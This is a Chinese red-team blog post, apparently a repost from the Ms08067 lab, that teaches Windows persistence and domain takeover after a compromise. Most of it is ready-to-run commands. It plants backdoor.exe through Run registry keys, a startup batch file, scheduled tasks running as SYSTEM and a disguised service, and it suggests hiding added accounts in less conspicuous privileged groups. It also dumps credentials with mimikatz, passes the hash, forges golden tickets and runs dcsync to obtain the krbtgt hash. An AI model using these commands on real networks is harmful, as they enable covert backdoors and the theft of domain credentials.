本文作者:麦烧玉米(Ms08067实验室红队小组成员)
我们经常会看到一个完整的攻击生命周期,大概有以下7个主要步骤:
其中第5个步骤“Installation”意思为“重新获得对系统的命令和控制(如果丢失),而不必重复步骤1到4”。当遇到一些操作不行的时候就要考虑权限问题,uac策略等!
在这篇文章中,我会介绍一些基本的持久性策略和技术!通常,触发C2通道的持久性机制存在于以下级别之一:
HKCR: HKEY_CLASSES_ROOT HKCU: HKEY_CURRENT_USER HKLM: HKEY_LOCAL_MACHINE HKU: HKEY_USERS HKCC: HKEY_CURRENT_CONFIG
创建一个REG_SZ值 字符串值 在HKCU\Software\Microsoft\Windows (其他的也行)
name Backdoor data C:\users\CreaTe\AppData\Local\Temp\backdoor.exe
在用户启动文件夹中创建批处理脚本 gc--Get-Content
@ echo off start /d "C:\Windows\System32\" calc.exe pause 难受不会写bat bat的作用应该是每次开机都启动bat触发backdoor.exe
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" PS C:\> $S = New-ScheduledTaskSettingsSet PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D
HKLM: HKEY_LOCAL_MACHINE HKLM\Software\Microsoft\Windows name/data
创建将自动或按需启动的服务 PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
以System运行 每天上午9点 PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe" PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest PS C:\> $S = New-ScheduledTaskSettingsSet PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D
runas脚本http://xinn.org/RunasVBS.html
参考:https://blog.csdn.net/u010984552/article/details/54891615
权限始终是一个问题 导出Server Hash mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt
sekurlsa::pth /user:Administrator /domain:GOD /ntlm:ccef208c6485269c20db2cad21734fe7 (/run:运行的程序,默认 cmd)
添加新的本地用户可以提供一种返回计算机的方法。如果将它们放在 Administrators组中太明显,请使用其他特权组,例如Remote Desktop Users,Remote Management Users或Backup Operators
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt mimikatz "kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名>/ptt" exit
参考: https://paper.tuisec.win/detail/af2385f4ed3a391 kerberos::golden /domain:GOD /sid:S-1-5-21-1218902331-2157346161- 1782232778 /target: WebServer /service: cifs /rc4:518b98ad4178a53695dc997aa02d455c /user:Administrator /ptt exit
OWA2010CN-God
拿下域控 lsadump::dcsync /domain:域名 /user:krbtgt ms14068 mimikatz kerberos::golden /domain:<域名> /sid:<域SID> /rc4:<KRBTGT NTLM Hash> /user:<任意用户名> /ptt exit
来源:Ms08067安全实验室
本文分享自 Ms08067安全实验室 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!